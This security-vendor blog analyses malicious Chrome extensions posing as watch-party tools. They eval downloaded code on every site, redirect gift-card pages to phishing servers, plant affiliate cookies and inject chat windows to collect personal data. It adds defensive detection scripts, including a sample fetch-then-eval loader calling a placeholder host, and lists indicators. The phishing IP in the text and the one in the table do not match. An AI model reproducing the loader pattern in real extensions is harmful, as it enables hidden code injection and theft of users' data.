Come Join the Scam Party

Authored by Oliver Devane, Vallabh Chole, and Aayush Tyagi

McAfee has recently observed several malicious Chrome Extensions which, once installed, will redirect users to phishing sites, insert Affiliate IDs and modify legitimate websites to exfiltrate personally identifiable information (PII) data. According to the Google Extension Chrome Store, the combined install base is 80,000.

One extension, ‘Netflix Party’, mimics the original Netflix Party extension, which allows groups of people to watch Netflix shows at the same time. However, this version monitors all the websites you visit and performs several malicious activities.

The malicious actor behind the extensions has created several Twitter accounts and fake review websites to deceive users into trusting and installing the extensions.

The victim will be tricked into installing the extension and their data will be stolen when browsing a gift card site.

The details of each step are as follows:

  1. The perpetrator creates malicious extensions and adds them to the Chrome Extension Store. They create fake websites to review the extensions and fake Twitter accounts to publicize them.
  2. A victim may perform a web or Twitter search for Netflix Party, read the review and click on a link that will lead them to the Google Chrome Store.
  3. They click to install the Extension and accept the permissions.
  4. The victim will either perform a web search or directly navigate to the gift card website. The Extension will identify the website and redirect them to the phishing page.
  5. The victim will enter their gift card information on the phishing page.
  6. The gift card information is posted to the server to which the malicious actor has access. They can now use or sell the stolen data and the victim will lose their funds.

Technical Analysis

This section contains the technical analysis of the malicious Chrome extension “bncibciebfeopcomdaknelhcohiidaoe”.

Manifest.json

The manifest.json file declares the permissions of the extension. Two entries are of particular concern: the ‘unsafe-eval’ setting in the ‘content_security_policy’, and the content script declaration that allows content.js to run on any website the user visits.

Background.js

When the extension is installed, the background.js script will be loaded. This file uses a simple obfuscation technique of putting all the code on one line, which makes it difficult to read. This is easily cleaned up by using a code beautifier; the image below shows the obfuscated script on the first line and the cleaned-up code below the red arrow.

This script accesses https[:]//accessdashboard[.]live to download a script and store it as the variable ‘code’ in Chrome's local storage. This stored variable is then referenced in the content.js script, which is executed on every visited website.

Content.js

After beautification, we see that the code reads the malicious script from the ‘code’ variable which was previously stored, and executes it.
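The three indicators discussed in the Manifest.json, Background.js and Content.js sections (an ‘unsafe-eval’ CSP, a content script matched on every site, and a fetch-then-store-then-eval loader split across two scripts) lend themselves to a static triage check. The script below is an added example, not code from the McAfee write-up or from the extension itself; both manifests and both script snippets are constructed samples that only mirror the shape described above, and the host `updates.example` is a placeholder.

```javascript
// Added example, not code from the McAfee write-up or from the extension.
// Static triage of an unpacked extension: flag the manifest settings the
// analysis calls out, and look for the fetch -> storage -> eval loader shape
// across the extension's scripts. Both manifests and both script snippets
// are constructed samples, not the real files.

const SUSPICIOUS_MANIFEST = {
  manifest_version: 2,
  name: "Example Party (constructed)",
  permissions: ["storage", "tabs", "<all_urls>"],
  content_security_policy: "script-src 'self' 'unsafe-eval'; object-src 'self'",
  background: { scripts: ["background.js"] },
  content_scripts: [{ matches: ["<all_urls>"], js: ["content.js"] }],
};

const BENIGN_MANIFEST = {
  manifest_version: 2,
  name: "Example Helper (constructed)",
  permissions: ["storage"],
  content_security_policy: "script-src 'self'; object-src 'self'",
  content_scripts: [{ matches: ["https://www.netflix.com/*"], js: ["content.js"] }],
};

// Match patterns that mean "every site the user visits".
const BROAD_MATCHES = ["<all_urls>", "*://*/*", "http://*/*", "https://*/*"];

function cspAllowsEval(manifest) {
  const csp = manifest.content_security_policy;
  // MV2 stores the policy as a string; MV3 uses an object with extension_pages.
  const text = typeof csp === "string" ? csp : csp && csp.extension_pages;
  return typeof text === "string" && text.includes("'unsafe-eval'");
}

function contentScriptsRunEverywhere(manifest) {
  return (manifest.content_scripts || []).some((cs) =>
    (cs.matches || []).some((m) => BROAD_MATCHES.includes(m)));
}

function hasBroadHostPermission(manifest) {
  const hosts = [...(manifest.permissions || []), ...(manifest.host_permissions || [])];
  return hosts.some((h) => BROAD_MATCHES.includes(h));
}

function auditManifest(manifest) {
  const findings = [];
  if (cspAllowsEval(manifest)) findings.push("csp-unsafe-eval");
  if (contentScriptsRunEverywhere(manifest)) findings.push("content-script-all-urls");
  if (hasBroadHostPermission(manifest)) findings.push("broad-host-permission");
  // The pairing is what matters: downloaded code can be eval'd, and the
  // content script carries it into every page.
  const paired = findings.includes("csp-unsafe-eval") && findings.includes("content-script-all-urls");
  const severity = paired ? "high" : findings.length > 0 ? "medium" : "none";
  return { name: manifest.name, findings, severity };
}

// Constructed script snippets mirroring the staged loader described above.
const SAMPLE_SOURCES = {
  "background.js":
    'fetch("https://updates.example/stage2.txt").then(r => r.text()).then(c => chrome.storage.local.set({ code: c }));',
  "content.js": 'chrome.storage.local.get("code", r => eval(r.code));',
};

const SOURCE_INDICATORS = {
  "remote-fetch": /\bfetch\s*\(|XMLHttpRequest/,
  "storage-write": /chrome\.storage\.(local|sync)\.set\s*\(/,
  "storage-read": /chrome\.storage\.(local|sync)\.get\s*\(/,
  "dynamic-eval": /\beval\s*\(|new\s+Function\s*\(/,
};

function scanSources(sources) {
  const hits = {};
  for (const [file, text] of Object.entries(sources)) {
    hits[file] = Object.keys(SOURCE_INDICATORS).filter((k) => SOURCE_INDICATORS[k].test(text));
  }
  const seen = new Set(Object.values(hits).flat());
  // All four stages present across the bundle = fetch -> store -> read -> eval.
  const stagedLoader = Object.keys(SOURCE_INDICATORS).every((k) => seen.has(k));
  return { hits, stagedLoader };
}

console.log(auditManifest(SUSPICIOUS_MANIFEST));
console.log(auditManifest(BENIGN_MANIFEST));
console.log(scanSources(SAMPLE_SOURCES));
```

The source scan is deliberately cross-file: neither background.js nor content.js looks alarming on its own, and it is the combination of a remote fetch, a write to extension storage, a read of that storage and a dynamic eval that reproduces the loader described in this analysis. Any one indicator alone is common in legitimate extensions and should be treated as a prompt for manual review rather than a verdict.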

‘Code’

The malicious code has three main functions: redirection for phishing, modifying cookies to add Affiliate IDs, and modifying website code to add chat windows.

Redirection for Phishing

Redirection for phishing works by checking whether the URL being accessed matches an entry in a list and, if so, redirecting the browser to a malicious IP address that hosts the phishing site.

URLs monitored are:

  • https[:]//www.target.com/guest/gift-card-balance
  • https[:]//www.macys.com/account/giftcardbalance
  • https[:]//www.nike.com/orders/gift-card-lookup
  • https[:]//www.nordstrom.com/nordstrom-gift-cards
  • https[:]//www.sephora.com/beauty/giftcards
  • https[:]//www.sephoragiftcardbalance.com
  • https[:]//balance.amexgiftcard.com
  • https[:]//prepaidbalance.americanexpress.com/GPTHBIWeb/validateIPAction.do?clientkey=retail%20sales%20channel
  • https[:]//amexprepaidcard.com
  • [:]//secure4.store.apple.com/shop/giftcard/balance

Upon navigating to one of the above sites, the user will be redirected to 164[.]90[.]144[.]88. An observant user would notice that the URL would have changed to an IP address, but some users may not.

The image below shows the Apple Phishing site and the various phishing kits being hosted on this server.

The phishing sites share similar code. If a user enters their gift card information, the data will be posted to 52.8.106.52. A network capture of the POST request is shown below:

Modifying cookies to add AffiliateIDs

The second malicious function contains AIPStore, a dictionary that maps a list of retail URLs to their respective monetizing sites, which provide the affiliate IDs. This function works by loading new tabs, which results in cookies being set on the visited sites. The flow below describes how the extension works.

  1. A user navigates to a retail website.
  2. If the retail website is contained in the AIPStore keymap, the extension will load a new tab with a link to a monetizing site which sets the cookie with the affiliate ID. The new tab is then closed, and the cookie will persist.
  3. The user will be unaware that a cookie has been set and will continue to browse the website.
  4. Upon purchasing any goods, the Affiliate ID will be recognized by the site vendor and commission will be sent to the Affiliate ID owner, which would be the malicious actor.

The left image below shows the original site with no affiliate cookie, the one on the right highlights the cookie that has been added by the extension.
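Both behaviours described in the two preceding sections, the redirect from a gift-card balance page to a bare IP address and the helper tab that is opened and closed before the user can notice it, leave traces in browser navigation and tab events that a defender can check for. The script below is an added example, not code from the McAfee write-up: it runs two such checks over a constructed event log in the shape one would assemble from Chrome's webNavigation and tabs events. The monitored gift-card URLs are those listed in the analysis; the redirect target 203.0.113.10 (a documentation address) and the hosts `shop.example`, `monetise.example` and `help.example` are constructed placeholders.

```javascript
// Added example, not code from the McAfee write-up. It applies the two
// behavioural patterns described above (redirect from a gift-card balance
// page to a bare IP address, and a helper tab that is opened and closed
// within a fraction of a second) to a constructed browser event log.

// Gift-card pages named in the write-up, refanged and stored as prefixes.
const WATCHED_PREFIXES = [
  "https://www.target.com/guest/gift-card-balance",
  "https://www.macys.com/account/giftcardbalance",
  "https://www.nike.com/orders/gift-card-lookup",
  "https://www.nordstrom.com/nordstrom-gift-cards",
  "https://www.sephora.com/beauty/giftcards",
  "https://balance.amexgiftcard.com",
];

// Constructed event log. 203.0.113.10 is a documentation address standing in
// for the attacker-controlled host; the .example hosts are placeholders.
const SAMPLE_EVENTS = [
  { t: 1000, type: "nav", tabId: 1, url: "https://www.target.com/guest/gift-card-balance" },
  { t: 1080, type: "nav", tabId: 1, url: "http://203.0.113.10/target/" },
  { t: 5000, type: "nav", tabId: 1, url: "https://shop.example/cart" },
  { t: 5020, type: "tab_created", tabId: 2, openerTabId: 1, url: "https://monetise.example/click?aff=AFF-1234&to=shop.example" },
  { t: 5400, type: "tab_removed", tabId: 2 },
  { t: 9000, type: "nav", tabId: 1, url: "https://www.nike.com/orders/gift-card-lookup" },
  { t: 9600, type: "nav", tabId: 1, url: "https://www.nike.com/orders/gift-card-lookup?step=2" },
  { t: 12000, type: "tab_created", tabId: 3, openerTabId: 1, url: "https://help.example/faq" },
  { t: 75000, type: "tab_removed", tabId: 3 },
];

const IPV4 = /^\d{1,3}(\.\d{1,3}){3}$/;

function hostOf(url) {
  try { return new URL(url).hostname; } catch (e) { return ""; }
}

// True when the host is a literal IPv4 or bracketed IPv6 address.
function isRawIpHost(url) {
  const h = hostOf(url);
  return IPV4.test(h) || (h.startsWith("[") && h.endsWith("]"));
}

function isWatchedUrl(url) {
  return WATCHED_PREFIXES.some((p) => url.startsWith(p));
}

// Pattern 1: a navigation lands on a bare IP address shortly after a
// watched gift-card page was requested in the same tab.
function detectIpRedirects(events, windowMs = 2000) {
  const lastNav = new Map(); // tabId -> previous nav event in that tab
  const findings = [];
  for (const ev of events) {
    if (ev.type !== "nav") continue;
    const prev = lastNav.get(ev.tabId);
    if (prev && isWatchedUrl(prev.url) && isRawIpHost(ev.url) && ev.t - prev.t <= windowMs) {
      findings.push({ kind: "ip-redirect", tabId: ev.tabId, from: prev.url, to: ev.url, delayMs: ev.t - prev.t });
    }
    lastNav.set(ev.tabId, ev);
  }
  return findings;
}

// Pattern 2: a tab opened by another tab to a third-party host and closed
// within maxLifeMs. A user never sees such a tab, which is the point of it.
function detectShortLivedTabs(events, maxLifeMs = 1000) {
  const opened = new Map();   // tabId -> tab_created event
  const currentUrl = new Map(); // tabId -> latest navigated URL
  const findings = [];
  for (const ev of events) {
    if (ev.type === "nav") {
      currentUrl.set(ev.tabId, ev.url);
    } else if (ev.type === "tab_created" && ev.openerTabId !== undefined) {
      opened.set(ev.tabId, ev);
    } else if (ev.type === "tab_removed" && opened.has(ev.tabId)) {
      const created = opened.get(ev.tabId);
      const parentUrl = currentUrl.get(created.openerTabId) || "";
      if (ev.t - created.t <= maxLifeMs && hostOf(created.url) !== hostOf(parentUrl)) {
        const params = [...new URL(created.url).searchParams.keys()];
        findings.push({ kind: "short-lived-tab", tabId: ev.tabId, url: created.url, parent: parentUrl, lifetimeMs: ev.t - created.t, params });
      }
      opened.delete(ev.tabId);
    }
  }
  return findings;
}

function analyseEvents(events) {
  return [...detectIpRedirects(events), ...detectShortLivedTabs(events)];
}

console.log(JSON.stringify(analyseEvents(SAMPLE_EVENTS), null, 2));
```

On the sample log the first check fires once, for the Target page that lands on the bare IP 80 ms later, while the second Nike navigation (same site, query string added) is left alone. The second check fires for the monetising tab that lived 380 ms, reporting its query parameter names so an analyst can see the affiliate identifier being passed; the help tab that stayed open for over a minute is ignored. The time windows are tunable and should be validated against normal traffic before alerting on them.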

Chat Windows

The final function checks the URLs being accessed against a list and, if one matches, injects a JS script into the page's HTML, which results in a chat window being displayed. The image below shows the injected script and the chat window.

The chat window may be used by the malicious actor to request PII data, credit card, and product key information.

Conclusion

This threat is a good example of the lengths malicious actors will go to in order to trick users into installing malware, such as creating Twitter accounts and fake review websites.

McAfee advises its customers to be cautious when installing Chrome Extensions and pay attention to the permissions that they are requesting.

The permissions will be shown by Chrome before the installation of the Extension. Customers should take extra steps to verify the authenticity of an extension if it requests permissions that enable it to run on every website you visit, such as the one detailed in this blog.

McAfee customers are protected against the malicious sites detailed in this blog as they are blocked with McAfee WebAdvisor as shown below.

The malicious code within the extension is detected as Phish-Extension. Please perform a ‘Full’ scan via the product.

| Type | Value | Product | Detected |
|---|---|---|---|
| URL – Phishing Sites | 164.90.141.88/* | McAfee WebAdvisor | Blocked |
| Chrome Extension | netflix party – bncibciebfeopcomdaknelhcohiidaoe | Total Protection and LiveSafe | Phish-Extension |
| Chrome Extension | teleparty – flddpiffdlibegmclipfcnmaibecaobi | Total Protection and LiveSafe | Phish-Extension |
| Chrome Extension | hbo-max-watch-party – dkdjiiihnadmgmmfobidmmegidmmjobi | Total Protection and LiveSafe | Phish-Extension |
| Chrome Extension | prime-watch-party – hhllgokdpekfchhhiknedpppjhgicfgg | Total Protection and LiveSafe | Phish-Extension |
| Chrome Extension | private-watch-party – maolinhbkonpckjldhnocgilkabpfodc | Total Protection and LiveSafe | Phish-Extension |
| Chrome Extension | hotstar-ad-blocker – hacogolfhplehfdeknkjnlblnghglfbp | Total Protection and LiveSafe | Phish-Extension |
| Chrome Extension | hbo-ad-blocker – cbchmocclikhalhkckeiofpboloaakim | Total Protection and LiveSafe | Phish-Extension |
| Chrome Extension | blocksite – pfhjfcifolioiddfgicgkapbkfndaodc | Total Protection and LiveSafe | Phish-Extension |
| Chrome Extension | hbo-enhanced – pkdpclgpnnfhpapcnffgjbplfbmoejbj | Total Protection and LiveSafe | Phish-Extension |
| Chrome Extension | hulu-watch-party – hkanhigmilpgifamljmnfppnllckkpda | Total Protection and LiveSafe | Phish-Extension |
| Chrome Extension | disney-plus-watch-party – flapondhpgmggemifmemcmicjodpmkjb | Total Protection and LiveSafe | Phish-Extension |
| Chrome Extension | spotify-ad-blocker – jgofflaejgklikbnoefbfmhfohlnockd | Total Protection and LiveSafe | Phish-Extension |
| Chrome Extension | ott-party – lldibibpehfomjljogedjhaldedlmfck | Total Protection and LiveSafe | Phish-Extension |
